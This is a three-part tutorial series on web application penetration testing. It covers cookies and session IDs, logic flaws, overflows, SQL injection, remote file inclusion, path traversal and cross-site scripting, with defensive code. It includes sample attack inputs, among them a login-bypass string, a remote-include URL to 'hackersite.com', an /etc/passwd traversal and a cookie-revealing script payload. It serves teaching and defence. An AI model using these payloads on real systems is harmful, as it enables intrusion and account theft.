Penetration Testing for Web Applications (Part Three)

Updated: 02 Nov 2010

by Jody Melbourne and David Jorm

In the first installment of this series we introduced the reader to web application security issues and stressed the significance of input validation. In the second installment, several categories of web application vulnerabilities were discussed and methods for locating these vulnerabilities were outlined. In this third and final article we will be investigating session security issues and cookies, buffer overflows and logic flaws, and providing links to further resources for the web application penetration tester.

Cookies

Cookies are a mechanism for maintaining persistent data on the client side of an HTTP exchange. They are not part of the HTTP specification, but are a de facto industry standard based on a specification issued by Netscape. Cookies use HTTP response headers to set values on the client side, and HTTP request headers to provide these values back to the server. The value is set using a 'Set-Cookie' header and returned using a 'Cookie' header. Take the following example of an exchange of cookies. The client requests a resource, and receives in the headers of the response:

Set-Cookie: PASSWORD=g0d; path=/; expires=Friday, 20-Jul-03 23:23:23 GMT

When the client requests a resource in path "/" on this server, it sends:

Cookie: PASSWORD=g0d

The browser is responsible for storing and retrieving cookie values. In both Netscape and Internet Explorer this is done using small temporary files; the security of these mechanisms is beyond the scope of this article, as we are more concerned with the problems of cookies themselves.

Cookies are often used to authenticate users to an application. If the user's cookie is stolen or captured, an attacker can impersonate that user. There have been numerous browser vulnerabilities in the past that allow attackers to steal known cookies -- for more information on client-side cookie security, please refer to the cross-site scripting section in part two of this series.

Cookies should be treated by the developer as another form of user input and be subjected to the same validation routines. There have been numerous examples in the past of SQL injection and other vulnerabilities that are exploitable through manipulating cookie values. Refer to the PHPNuke admin cookie SQL injection, and Webware WebKit cookie overflow vulnerabilities.
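
As a minimal illustration of treating cookies as just another form of user input (not code from the original article), the following PHP sketch validates a hypothetical 'lang' cookie against a whitelist before it is used anywhere else; the cookie name and allowed values are assumptions for the example:

 <?php
 // Hypothetical example: validate a 'lang' cookie against a whitelist
 // before it is used in a query or file path.
 $allowed = array('en', 'de', 'fr');

 $lang = isset($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en';

 if (!in_array($lang, $allowed, true)) {
     // Anything outside the expected domain is rejected, not "cleaned up".
     $lang = 'en';
 }

 // $lang is now safe to use in queries or include paths.
 echo "Using language: " . htmlspecialchars($lang);
 ?>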

Session Security and Session-IDs

Most modern web scripting languages include mechanisms to maintain session state -- that is, the ability to establish variables such as access rights and localization settings which will apply to every interaction a user has with the web application until they terminate their session. This is achieved by the web server issuing a pseudo-unique string to the client, known as a Session ID. The server associates elements of data with this ID, and the client provides the ID with each subsequent request made to the application. Both PHP and ASP have built-in support for sessions, with PHP providing them via GET variables and cookies, and ASP via cookies only.

PHP's support for GET variable sessions is by all accounts an inferior mechanism, but is provided because not all browsers support cookies and not all users will accept them. Using this method, the Session ID is passed via a GET variable named PHPSESSID, provided in the query string of every request made. PHP automatically modifies all links at runtime to add the PHPSESSID to the link URL, thereby persisting state. Not only is this vulnerable to replay attacks (since the Session ID forms part of the URL), it makes them trivial -- searching proxy logs, viewing browser histories or socially engineering a user into pasting you a URL as they see it (containing their Session ID) are all common methods of attack. Combine GET variable sessions with a cross site scripting bug and you have a simple way of forcing the disclosure of the Session ID. This is achieved by injecting JavaScript code which posts the document URL to a remote logging application, allowing the attacker to simply watch his logging application for the Session IDs to roll in.

The cookie method works in a similar manner, except the PHPSESSID (or Session-ID in the case of ASP) variable is persisted using a cookie rather than a GET variable. At a protocol level this is just as dangerous as the GET method, as the Session ID can still be logged, replayed or socially engineered; it is, however, obfuscated and more difficult to abuse because the Session ID is not embedded in the URL. The combination of cookies, sessions and a cross site scripting bug is just as dangerous, as the attacker need only post the document.cookie property to his logging application to extract the Session ID. Additionally, as a matter of convenience for the user, Session IDs are frequently set using cookies with either no expiry or a virtually infinite expiry date, such as a year from the present. This means the cookie persists on the client side and the window of opportunity for replaying a captured Session ID is effectively indefinite.
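
As a hedged sketch of the corresponding defensive measures in PHP (not part of the original article), the snippet below shortens the session cookie lifetime and regenerates the Session ID after login, using the standard session_set_cookie_params() and session_regenerate_id() functions; the cookie path and the credentials check are assumptions:

 <?php
 function check_credentials($user, $pass) {
     // Hypothetical stub -- a real application would check its user store.
     return $user === 'admin' && $pass === 'secret';
 }

 // Illustrative hardening: limit the session cookie to 30 minutes of life
 // and restrict it to the application's path.
 session_set_cookie_params(1800, '/app/');
 session_start();

 // After a successful login, issue a fresh Session ID so that any ID
 // captured before authentication becomes worthless.
 if (isset($_POST['user'], $_POST['pass']) && check_credentials($_POST['user'], $_POST['pass'])) {
     session_regenerate_id();
     $_SESSION['authenticated'] = true;
 }
 ?>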

There are also many other, albeit less common, forms of user session management. One technique is to embed the Session ID string in an <input type="hidden"> tag within a <form> element. Another is to use the Session ID strings provided by the Apache webserver for user tracking purposes as authentication tokens. The Apache project never intended these to be used for anything other than user tracking and statistical purposes, and the algorithm is based on a concatenation of known data elements on the server side. The details of Session ID bruteforcing and cryptographic hashing algorithms are beyond the scope of this article, but David Endler has provided a good paper on this topic (.pdf) if you are interested in reading more.

Session IDs are very much an Achilles' Heel of web applications, as they are simply tack-ons to maintain state for HTTP -- an essentially stateless technology. The penetration tester should examine in detail the mechanism used to generate Session IDs, how the IDs are being persisted and how this can be combined with client-side bugs (such as cross site scripting) to facilitate replay attacks.

Logic Flaws

Logic flaws are a broad category of vulnerability encompassing most bugs which do not explicitly fall into another category. A logic flaw is a failure in the web application's logic to correctly perform conditional branching or apply security. For example, take the following snippet of PHP code:

 <?php
 $a = false;
 $b = true;
 $c = false;

 if ($b && $c || $a && $c || $b)
 	echo "True";
 else
 	echo "False";
 ?>

The above code is attempting to ensure that at least two of the three variables are set before printing "True". The logic flaw is that, given PHP's operator precedence, the expression groups as ($b && $c) || ($a && $c) || $b, so the final $b term stands alone and simply having $b equal to true will cause the if statement to succeed. This can be patched by replacing the if statement with either of the following:

 if ($b && $c || $a && ($c || $b))

 if ($b && $c || $a && $c || $a && $b)

Logic flaws are difficult to identify from a blackbox testing perspective, and they more commonly make themselves apparent as a result of testing for another kind of vulnerability. A comprehensive code audit where the conditional branching logic is reviewed for adherence to program specification is the most effective way to trap logic flaws. An example of a logic flaw issue is the SudBox Boutique login bypass vulnerability.

Binary Attacks

Web applications developed in a language that employs static buffers (such as C/C++) may be vulnerable to traditional binary attacks such as format string bugs and buffer overflows. Although code and content manipulation issues (such as SQL and PHP code injection) are more common, there have been numerous cases in the past of popular web applications with overflow vulnerabilities.

A buffer overflow occurs when a program attempts to store more data in a static buffer than intended. The additional data overwrites and corrupts adjacent blocks of memory, and can allow an attacker to take control of the flow of execution and inject arbitrary instructions. Overflow vulnerabilities are more commonly found in applications developed in the C/C++ language; newer languages such as C# provide additional stack protection for the careless developer. Recent examples of overflows in web applications include mnoGoSearch and Oracle E-Business Suite.

Buffer overflows can often be located through black-box testing by feeding increasingly large values into form inputs, header fields and cookie fields. In the case of ISAPI applications, a 500 error message (or time-out) in response to a large input may indicate a segmentation fault at the server side. The environment should first be fingerprinted to determine whether the development language is prone to overflow attacks, as overflows are far more common in compiled executables than in scripted applications. Note that most of the popular web development languages (Java, PHP, Perl, Python) are interpreted languages in which the interpreter handles all memory allocation.
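
The following PHP sketch (an illustration, not a tool from the article) probes a single GET parameter with progressively larger payloads and reports the HTTP status returned; the target URL and parameter name are placeholders you would replace with inputs discovered during fingerprinting:

 <?php
 // Hypothetical target and parameter -- substitute your own.
 $target = 'http://www.example.com/search.php';
 $param  = 'query';

 foreach (array(128, 512, 2048, 8192, 32768) as $len) {
     $payload = str_repeat('A', $len);
     $url     = $target . '?' . $param . '=' . urlencode($payload);

     // @ suppresses the warning a 500 response would otherwise raise.
     $body   = @file_get_contents($url);
     $status = isset($http_response_header[0]) ? $http_response_header[0] : 'no response';

     echo $len . " bytes -> " . $status . "\n";
 }
 ?>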

Format string attacks occur when certain C functions process user-supplied input containing formatting characters (%). The printf/fprintf/sprintf family, syslog() and setproctitle() functions are known to misbehave when formatting characters are passed to them unchecked. In some cases, format string bugs can lead to an attacker gaining control over the flow of execution of a program. Refer to the PWC.CGI vulnerability for an example of this type of exploit in a web application.

Useful Testing Tools

A number of applications have been developed to assist the blackbox tester with locating web application vulnerabilities. While analysis of programmatic output is probably best accomplished by hand, a large portion of the blackbox testing methodology can be scripted and automated.

AtStake WebProxy

WebProxy sits between the client browser and the web application, capturing and decoding requests to allow the developer to analyze user interactions, study exploit techniques, and manipulate requests on-the-fly.

Home Page: http://www.atstake.com/webproxy

SPIKE Proxy

SPIKE Proxy functions as an HTTP/HTTPS proxy and allows the blackbox tester to automate a number of web application vulnerability tests (including SQL injection, directory traversal and brute force attacks).

Home Page: http://www.immunitysec.com/spike.html

WebserverFP

WebserverFP is an HTTPD fingerprinting tool that uses values and formatting within server responses to determine the web server software in use.

Home Page: http://www.astralclinic.com

KSES

KSES is an HTML security filter written in PHP. It filters out 'nasty' HTML elements and helps to prevent input-validation issues such as cross-site scripting (XSS) attacks.

Home Page: http://sourceforge.net/projects/kses

Mieliekoek.pl

This tool, written by roelof@sensepost.com, will crawl through a collection of pages and scripts searching for potential SQL injection issues.

Download: http://www.securityfocus.com/archive/101/257713

Sleuth

Sleuth is a commercial application for locating web application security vulnerabilities. It includes intercept proxy and web-spider features.

Home Page: http://www.sandsprite.com/Sleuth

Webgoat

The OWASP Webgoat project aims to create an interactive learning environment for web application security. It teaches developers, using practical exercises, the most common web application security and design flaws. It is written in Java and installers are available for both *nix and Win32 systems.

Home Page: http://www.owasp.org/development/webgoat

AppScan

AppScan is a commercial web application security testing tool developed by Sanctum Inc. It includes features such as code sanitation, offline analysis, and automated scan scheduling.

Home Page: http://www.sanctuminc.com/solutions/appscan/index.html

Conclusion

Web applications are becoming the standard for client-server communications over the Internet. As more and more applications are 'web enabled', the number of web application security issues will increase; traditional local system vulnerabilities, such as directory traversals, overflows and race conditions, are opened up to new vectors of attack. The responsibility for the security of sensitive systems will rest increasingly with the web developer, rather than the vendor or system administrator.

In this series of articles we hope to have stressed the importance of user input validation and have demonstrated how all major web application security issues relate back to this concept. The best defense against input-manipulation attacks is to treat all input with a healthy dose of paranoia and the notion of "if not explicitly allowed, deny." Dealing with user complaints about non-permitted characters is always going to be less painful than a security incident stemming from unfiltered input.

Author Credit

View more articles by Jody Melbourne and David Jorm on SecurityFocus.



Penetration Testing for Web Applications (Part Two)

Updated: 02 Nov 2010

by Jody Melbourne and David Jorm

Our first article in this series covered user interaction with Web applications and explored the various methods of HTTP input that are most commonly utilized by developers. In this second installment we will be expanding upon issues of input validation - how developers routinely, through a lack of proper input sanity and validity checking, expose their back-end systems to server-side code-injection and SQL-injection attacks. We will also investigate the client-side problems associated with poor input-validation such as cross-site scripting attacks.

The Blackbox Testing Method

The blackbox testing method is a technique for hardening and penetration-testing Web applications where the source code to the application is not available to the tester. It forces the penetration tester to look at the Web application from a user's perspective (and therefore, an attacker's perspective). The blackbox tester uses fingerprinting methods (as discussed in Part One of this series) to probe the application and identify all expected inputs and interactions from the user. The blackbox tester, at first, tries to get a 'feel' for the application and learn its expected behavior. The term blackbox refers to this Input/UnknownProcess/Output approach to penetration testing.

The tester attempts to elicit exception conditions and anomalous behavior from the Web application by manipulating the identified inputs - using special characters, white space, SQL keywords, oversized requests, and so forth. Any unexpected reaction from the Web application is noted and investigated. This may take the form of scripting error messages (possibly with snippets of code), server errors (HTTP 500), or half-loaded pages.

Figure 1 - Blackbox testing GET variables

Any strange behavior on the part of the application, in response to strange inputs, is certainly worth investigating as it may mean the developer has failed to validate inputs correctly!

SQL Injection Vulnerabilities

Many Web application developers (regardless of the environment) do not properly strip user input of potentially "nasty" characters before using that input directly in SQL queries. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Locating SQL Injection Vulnerabilities

Often the most effective method of locating SQL injection vulnerabilities is by hand -- studying application inputs and inserting special characters. With many of the popular backends, informative error pages are displayed by default, which can often give clues to the SQL query in use: when attempting SQL injection attacks, you want to learn as much as possible about the syntax of the database queries involved.

Figure 2 - Potential SQL injection vulnerability

Figure 3 - Another potential SQL injection hole
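
As a rough sketch of automating this manual probing (this is illustrative, not one of the tools discussed later in the series), the PHP snippet below appends a single quote to a chosen parameter and looks for tell-tale database error strings in the response; the URL, parameter name and error signatures are assumptions:

 <?php
 // Hypothetical target -- replace with an input identified during fingerprinting.
 $base  = 'http://www.example.com/browse.php';
 $param = 'categoryID';

 $url  = $base . '?' . $param . '=' . urlencode("1'");
 $body = @file_get_contents($url);

 // Common error signatures; real back-ends vary.
 $signatures = array('ODBC', 'SQL syntax', 'mysql_fetch', 'Unclosed quotation mark');

 foreach ($signatures as $sig) {
     if ($body !== false && stripos($body, $sig) !== false) {
         echo "Possible SQL injection: response contains '" . $sig . "'\n";
     }
 }
 ?>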

Example: Authentication bypass using SQL injection

This is one of the most commonly used examples of an SQL injection vulnerability, as it is easy to understand for non-SQL-developers and highlights the extent and severity of these vulnerabilities. One of the simplest ways to validate a user on a Web site is by providing them with a form, which prompts for a username and password. When the form is submitted to the login script (eg. login.asp), the username and password fields are used as variables within an SQL query.

Examine the following code (using MS Access DB as our backend):

  user = Request.form("user")
  pass = Request.form("pass")

  Set Conn = Server.CreateObject("ADODB.Connection")
  Set Rs = Server.CreateObject("ADODB.Recordset")

  Conn.Open (dsn)
  SQL = "SELECT C=COUNT(*) FROM users where pass='" & pass & "' and user='" & user & "'"
  rs.open (sql, conn)

  if rs.eof or rs.bof then
    response.write "Database Error"
  else
    if rs("C") < 1 then
      response.write "Invalid Credentials"
    else
      response.write "Logged In"
    end if
  end if

In this scenario, no sanity or validity checking is being performed on the user and pass variables from our form inputs. The developer may have client-side (eg. Javascript) checks on the inputs, but as has been demonstrated in the first part of this series, any attacker who understands HTML can bypass these restrictions. If the attacker were to submit the following credentials to our login script:

user: test' OR '1'='1
pass: test

the resulting SQL query would look as follows:

SELECT C=COUNT(*) FROM users where pass='test' and user='test' OR '1'='1'

In plain English: "count the users where user and pass are equal to 'test', or where 1 is equal to 1." As the final condition is always true, every row matches, the count is greater than zero, and the query succeeds - in this case, logging the attacker into the application.

For recent examples of this class of vulnerability, please refer to http://www.securityfocus.com/bid/4520 and http://www.securityfocus.com/bid/4931. Both of these advisories detail SQL authentication issues similar to the above.
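
For contrast, here is a hedged, modern PHP sketch of the same login check using a parameterized query (mysqli prepared statements). This illustrates the mitigation rather than reproducing the article's ASP code, and the connection details, table and column names are assumptions:

 <?php
 // Hypothetical credentials check using a prepared statement, so the
 // user-supplied values can never alter the structure of the query.
 $db = new mysqli('localhost', 'appuser', 'apppass', 'appdb');

 $stmt = $db->prepare('SELECT COUNT(*) FROM users WHERE user = ? AND pass = ?');
 $stmt->bind_param('ss', $_POST['user'], $_POST['pass']);
 $stmt->execute();
 $stmt->bind_result($count);
 $stmt->fetch();

 echo ($count > 0) ? 'Logged In' : 'Invalid Credentials';
 ?>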

MS-SQL Extended stored procedures

Microsoft SQL Server 7 supports the loading of extended stored procedures (a procedure implemented in a DLL that is called by the application at runtime). Extended stored procedures can be used in the same manner as database stored procedures, and are usually employed to perform tasks related to the interaction of the SQL server with its underlying Win32 environment. MSSQL has a number of built-in XSPs - most of these stored procedures are prefixed with an xp_.

Some of the built-in functions useful to the MSSQL pen-tester:

* xp_cmdshell - execute shell commands
* xp_enumgroups - enumerate NT user groups
* xp_logininfo - current login info
* xp_grantlogin - grant login rights
* xp_getnetname - returns WINS server name
* xp_regdeletekey - registry manipulation
* xp_regenumvalues
* xp_regread
* xp_regwrite
* xp_msver - SQL server version info

A non-hardened MS-SQL server may allow the DBO user to access these potentially dangerous stored procedures (which are executed with the permissions of the SQL server instance - in many cases, with SYSTEM privileges).

There are many extended/stored procedures that should not be accessible to any user other than the DB owner. A comprehensive list can be found at MSDN: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_sp_00_519s.asp

A well-maintained guide to hardening MS-SQL Server 7 and 2000 can be found at SQLSecurity.com: http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=3&tabid=4

PHP and MySQL Injection

Despite PHP escaping a number of 'special' characters when magic_quotes_gpc is enabled, a vulnerable PHP Web application with a MySQL backend can be manipulated in a similar manner to the ASP application above. MySQL does not allow direct shell execution like MSSQL's xp_cmdshell, but in many cases it is still possible for the attacker to append arbitrary conditions to queries, or use UNIONs and subselects to access or modify records in the database.
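
A minimal sketch of why magic_quotes alone is not enough (an illustration, not code from the article): numeric parameters are typically used unquoted in the SQL statement, so the injection needs no quote character at all, and casting the input to an integer is the simplest fix. The table and column names are assumptions:

 <?php
 // Vulnerable: $_GET['id'] is used unquoted, so a value such as
 // "1 OR 1=1" changes the query without any quote characters,
 // and magic_quotes never comes into play.
 $sql = "SELECT title FROM articles WHERE id = " . $_GET['id'];

 // Safer: force the value into the expected numeric domain.
 $id  = intval($_GET['id']);
 $sql = "SELECT title FROM articles WHERE id = " . $id;
 ?>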

For more information on PHP/MySQL security issues, refer to http://www.phpadvisory.com. PHP/MySQL security issues are on the increase - see the phpMyshop (http://www.securityfocus.com/bid/6746) and PHPNuke (http://www.securityfocus.com/bid/7194) advisories.

Code and Content Injection

What is code injection? Code injection vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself.

This vulnerability hinges upon the manner in which the application loads and passes through the contents of these manipulated files - if this is done before the scripting language is parsed and executed, the user-modified content may also be subject to parsing and execution.

Example: A simple message board in PHP

The following snippet of PHP code is used to display posts for a particular message board. It retrieves the messageid GET variable from the user and opens a file $messageid.txt under /var/www/forum:

 <?php
 	include('/var/www/template/header.inc');
 	$messageid = isset($_GET['messageid']) ? $_GET['messageid'] : null;
 	if ($messageid !== null && file_exists('/var/www/forum/' . stripslashes($messageid) . '.txt') &&
 	    is_numeric($messageid)) {
 		include('/var/www/forum/' . stripslashes($messageid) . '.txt');
 	} else {
 		include('/var/www/template/error.inc');
 	}
 	include('/var/www/template/footer.inc');
 ?>

Although the is_numeric() test prevents the user from entering a file path as the messageid, the content of the message file is not checked in any way. (The problem with allowing unchecked entry of file paths is explained later.) If the message contained PHP code, it would be include()'d and therefore executed by the server.

A simple method of exploiting this example vulnerability would be to post to the message board a simple chunk of code in the language of the application (PHP in this example), then view the post and see if the output indicates the code has been executed.

Server Side Includes (SSI)

SSI is a mechanism for including files using a special form of HTML comment which predates the include functionality of modern scripting languages such as PHP and JSP. Older CGI programs and 'classic' ASP scripts still use SSI to include libraries of code or re-usable elements of content, such as a site template header and footer. SSI is interpreted by the Web server, not the scripting language, so if SSI tags can be injected at the time of script execution these will often be accepted and parsed by the Web server. Methods of attacking this vulnerability are similar to those shown above for scripting language injection. SSI is rapidly becoming outmoded and disused, so this topic will not be covered in any more detail.

Miscellaneous Injection

There are many other kinds of injection attacks common amongst Web applications. Since a Web application relies primarily upon the contents of headers, cookies and GET/POST variables as input, the actions performed by the application that are driven by these variables must be thoroughly examined. There is a potentially limitless scope of actions a Web application may perform using these variables: opening files, searching databases, interfacing with other command systems and, as is increasingly common in the Web services world, interfacing with other Web applications. Each of these actions has its own syntax and requires that input variables be sanity-checked and validated in its own particular manner.

For example, as we have seen with SQL injection, SQL special characters and keywords must be stripped. But what about a Web application that opens a serial port and logs information remotely via a modem? Could the user input a modem command escape string, cause the modem to hang up and redial other numbers? This is merely one example of the concept of injection. The critical point for the penetration tester is to understand what the Web application is doing in the background -- the function calls and commands it is executing -- and whether the arguments to these calls or strings of commands can be manipulated via headers, cookies and GET/POST variables.

Example: PHP fopen()

As a real world example, take the widespread PHP fopen() issue. PHP's file-open fopen() function allows for URLs to be entered in the place of a filename, simplifying access to Web services and remote resources. We will use a simple portal page as an example:

URL: http://www.example.com/index.php?file=main

 <?php
 	include('/var/www/template/header.inc');
 	if (isset($_GET['file'])) {
 		$file = $_GET['file'];
 		$fp = fopen("$file" . ".html", "r");
 	} else {
 		$fp = fopen("main.html", "r");
 	}
 	include('/var/www/template/footer.inc');
 ?>

The index.php script includes header and footer code, and fopen()'s the page indicated by the file GET variable. If no file variable is set, it defaults to main.html. The developer is forcing a file extension of .html, but is not specifying a directory prefix. A PHP developer inspecting this code should notice immediately that it is vulnerable to a directory traversal attack, as long as the filename requested ends in .html (see below).

However, due to fopen()'s URL handling features, an attacker in this case could submit:

http://www.example.com/index.php?file=http://www.hackersite.com/main

This would force the example application to fopen() the file main.html at www.hackersite.com. If this file were to contain PHP code, it would be incorporated into the output of the index.php application, and would therefore be executed by the server. In this manner, an attacker is able to inject arbitrary PHP code into the output of the Web application, and force server-side execution of the code of his/her choosing.

W-Agora forum was recently found to have such a vulnerability in its handling of user inputs that could result in fopen() attacks - refer to http://www.securityfocus.com/bid/6463 for more details. This is a perfect example of this particular class of vulnerability.

Many skilled Web application developers are aware of current issues such as SQL injection and will use the many sanity-checking functions and command-stripping mechanisms available. However, once less common command systems and protocols become involved, sanity-checking is often flawed or inadequate due to a lack of comprehension of the wider issues of input validation.

Path Traversal and URIs

A common use of Web applications is to act as a wrapper for files of Web content, opening them and returning them wrapped in chunks of HTML. This can be seen in the above sample for code injection. Once again, sanity checking is the key. If the variable being read in to specify the file to be wrapped is not checked, a relative path can be entered.

Copying from our misc. code injection example, if the developer were to fail to specify a file suffix with fopen():

fopen("$file" , "r");

...the attacker would be able to traverse to any file readable by the Web application.

http://www.example.com/index.php?file=../../../../etc/passwd

This request would return the contents of /etc/passwd unless additional stripping of the path character (/.) had been performed on the file variable.

This problem is compounded by the automatic handling of URIs by many modern Web scripting technologies, including PHP, Java and Microsoft's .NET. If this is supported on the target environment, vulnerable applications can be used as an open relay or proxy:

http://www.example.com/index.php?file=http://www.google.com/

This flaw is one of the easiest security issues to spot and rectify, although it remains common on smaller sites whose application code performs basic content wrapping. The problem can be mitigated in two ways. First, by implementing an internal numeric index to the documents or, as in our message board code, using files named in numeric sequence with a static prefix and suffix. Second, by stripping any path characters such as [/\.] which attackers could use to access resources outside of the application's directory tree.
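
As a brief, hedged sketch of the second mitigation (illustrative only; the directory and parameter names are assumptions), the snippet below reduces the requested name to its base filename and confines it to the content directory before wrapping it:

 <?php
 // Strip any path components, then build the path inside the content tree.
 $name = isset($_GET['file']) ? basename($_GET['file']) : 'main';

 // Reject anything that is not a plain alphanumeric document name.
 if (!preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
     $name = 'main';
 }

 $path = '/var/www/content/' . $name . '.html';

 if (file_exists($path)) {
     readfile($path);
 }
 ?>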

Cross Site Scripting

Cross Site Scripting attacks (a form of content-injection attack) differ from the many other attack methods covered in this article in that they affect the client side of the application (i.e. the user's browser). Cross Site Scripting (XSS) occurs wherever a developer incorrectly allows a user to manipulate the HTML output of the application - this may be the result of a search query, or any other output where the user's input is displayed back to the user without any stripping of HTML content.

A simple example of XSS can be seen in the following URL:

http://server.example.com/browse.cfm?categoryID=1&name=Books

In this example the content of the 'name' parameter is displayed on the returned page. A user could submit the following request:

http://server.example.com/browse.cfm?categoryID=1&name=<h1>Books

If the characters < > are not being correctly stripped or escaped by this application, the "<h1>" would be returned within the page and parsed by the browser as valid HTML. A better example would be as follows:

http://server.example.com/browse.cfm?categoryID=1&name=<script>alert(document.cookie);</script>

In this case, we have managed to inject Javascript into the resulting page. The relevant cookie (if any) for this session would be displayed in a popup box upon submitting this request.

This can be abused in a number of ways, depending on the intentions of the attacker. A short piece of Javascript to submit a user's cookie to an arbitrary site could be placed into this URL. The request could then be hex-encoded and sent to another user, in the hope that they open the URL. Upon clicking the trusted link, the user's cookie would be submitted to the external site. If the original site relies on cookies alone for authentication, the user's account would be compromised. We will be covering cookies in more detail in part three of this series.

In most cases, XSS would only be attempted from a reputable or widely-used site, as a user is more likely to click on a long, encoded URL if the server domain name is trusted. This kind of attack does not allow for any access to the client beyond that of the affected domain (in the user's browser security settings).

For more details on Cross-Site Scripting and its potential for abuse, please refer to the CGISecurity XSS FAQ at http://www.cgisecurity.com/articles/xss-faq.shtml.
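
A minimal PHP sketch of the standard mitigation -- encoding user-controlled values before they are echoed back -- is shown below. This is an illustration, not code from the article; the parameter name follows the example above, and htmlspecialchars() is the standard PHP escaping function:

 <?php
 // Never echo user input verbatim; escape it for the HTML context first.
 $name = isset($_GET['name']) ? $_GET['name'] : '';

 echo '<p>Results for category: ' . htmlspecialchars($name, ENT_QUOTES) . '</p>';
 ?>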

Conclusion

In this article we have attempted to provide the penetration tester with a good understanding of the issue of input validation. Each of the subtopics covered in this article are deep and complex issues, and could well require a series of their own to cover in detail. The reader is encouraged to explore the documents and sites that we have referenced for further information.

The final part of this series will discuss in more detail the concepts of sessions and cookies - how Web application authentication mechanisms can be manipulated and bypassed. We will also explore the issue of traditional attacks (such as overflows and logic bugs) that have plagued developers for years, and are still quite common in the Web applications world.

This article originally appeared on SecurityFocus.com -- reproduction in whole or in part is not allowed without expressed written consent.


Penetration Testing for Web Applications (Part One)

This is the first in a series of three articles on penetration testing for Web applications. The first installment provides the penetration tester with an overview of Web applications - how they work, how they interact with users, and most importantly how developers can expose data and systems with poorly written and secured Web application front-ends.

Note: It is assumed that the reader of this article has some knowledge of the HTTP protocol - specifically, the format of HTTP GET and POST requests, and the purpose of various header fields. This information is available in RFC2616.

Web applications are becoming more prevalent and increasingly more sophisticated, and as such they are critical to almost all major online businesses. As with most security issues involving client/server communications, Web application vulnerabilities generally stem from improper handling of client requests and/or a lack of input validation checking on the part of the developer.

The very nature of Web applications - their ability to collate, process and disseminate information over the Internet - exposes them in two ways. First and most obviously, they have total exposure by nature of being publicly accessible. This makes security through obscurity impossible and heightens the requirement for hardened code. Second and most critically from a penetration testing perspective, they process data elements from within HTTP requests - a protocol that can employ a myriad of encoding and encapsulation techniques.

Most Web application environments (including ASP and PHP, which will both be used for examples throughout this series) expose these data elements to the developer in a manner that fails to identify how they were captured, and hence what kind of validation and sanity checking should apply to them. Because the Web "environment" is so diverse and contains so many forms of programmatic content, input validation and sanity checking are the key to Web application security. This involves both identifying and enforcing the valid domain of every user-definable data element, as well as a sufficient understanding of the source of all data elements to determine what is potentially user-definable.

The Root of the Issue: Input Validation

Input validation issues can be difficult to locate in a large codebase with lots of user interactions, which is the main reason that developers employ penetration testing methodologies to expose these problems. Web applications are, however, not immune to the more traditional forms of attack. Poor authentication mechanisms, logic flaws, unintentional disclosure of content and environment information, and traditional binary application flaws (such as buffer overflows) are rife. When approaching a Web application as a penetration tester, all this must be taken into account, and a methodical process of input/output or "blackbox" testing, in addition to (if possible) code auditing or "whitebox" testing, must be applied.

What exactly is a Web application?

A Web application is an application, generally composed of a collection of scripts, that resides on a Web server and interacts with databases or other sources of dynamic content. Web applications are fast becoming ubiquitous as they allow service providers and their clients to share and manipulate information in an (often) platform-independent manner via the infrastructure of the Internet. Some examples of Web applications include search engines, Webmail, shopping carts and portal systems.

How does it look from the user's perspective?

Web applications typically interact with the user via FORM elements and GET or POST variables (even a 'Click Here' button is usually a FORM submission). With GET variables, the inputs to the application can be seen within the URL itself; with POST requests, however, it is often necessary to study the source of form-input pages (or capture and decode valid requests) in order to determine the user's inputs.

An example HTTP request that might be provided to a typical Web application is as follows:

GET /sample.php?var=value&var2=value2 HTTP/1.1 | HTTP-METHOD REQUEST-URI PROTOCOL/VERSION
Session-ID: 361873127da673c | Session-ID Header
Host: www.webserver.com | Host Header
<CR><LF><CR><LF> | Two carriage return line feeds

Every element of this request can potentially be used by the Web application processing the request. The REQUEST-URI identifies the unit of code that will be invoked, along with the query string: an ampersand-separated list of variable=value pairs defining the input parameters. This is the main form of Web application input. The Session-ID header provides a token identifying the client's established session as a primitive form of authentication. The Host header is used to distinguish between virtual hosts sharing the same IP address and will typically be parsed by the Web server, but is, in theory, within the domain of the Web application.

As a penetration tester you must use all input methods available to you in order to elicit exception conditions from the application. Thus, you cannot be limited to what a browser or automatic tools provide. It is quite simple to script HTTP requests using utilities like curl, or shell scripts using netcat. The process of exhaustive blackbox testing a Web application is one that involves exploring each data element, determining the expected input, manipulating or otherwise corrupting this input, and analysing the output of the application for any unexpected behaviour.
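
As a small illustration of scripting requests outside the browser (a sketch in PHP rather than curl or netcat, with a placeholder host), the snippet below sends a hand-built GET request, including an arbitrary Session-ID header, and prints the raw response:

 <?php
 // Hypothetical target host and resource.
 $host = 'www.example.com';
 $path = '/sample.php?var=value&var2=value2';

 $fp = fsockopen($host, 80, $errno, $errstr, 10);
 if (!$fp) {
     die("Connection failed: $errstr ($errno)\n");
 }

 // Build the request by hand so every header is under our control.
 $request  = "GET $path HTTP/1.1\r\n";
 $request .= "Host: $host\r\n";
 $request .= "Session-ID: 361873127da673c\r\n";
 $request .= "Connection: close\r\n\r\n";

 fwrite($fp, $request);
 while (!feof($fp)) {
     echo fgets($fp, 1024);
 }
 fclose($fp);
 ?>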

The Information Gathering Phase

Fingerprinting the Web Application Environment

One of the first steps of the penetration test should be to identify the Web application environment, including the scripting language and Web server software in use, and the operating system of the target server. All of these crucial details are simple to obtain from a typical Web application server through the following steps:

  1. Investigate the output from HEAD and OPTIONS http requests

    The header and any page returned from a HEAD or OPTIONS request will usually contain a SERVER: string or similar detailing the Web server software version and possibly the scripting environment or operating system in use.

    OPTIONS / HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Wed, 04 Jun 2003 11:02:45 GMT
    MS-Author-Via: DAV
    Content-Length: 0
    Accept-Ranges: none
    DASL: <DAV:sql>
    DAV: 1, 2
    Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
    Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
    Cache-Control: private

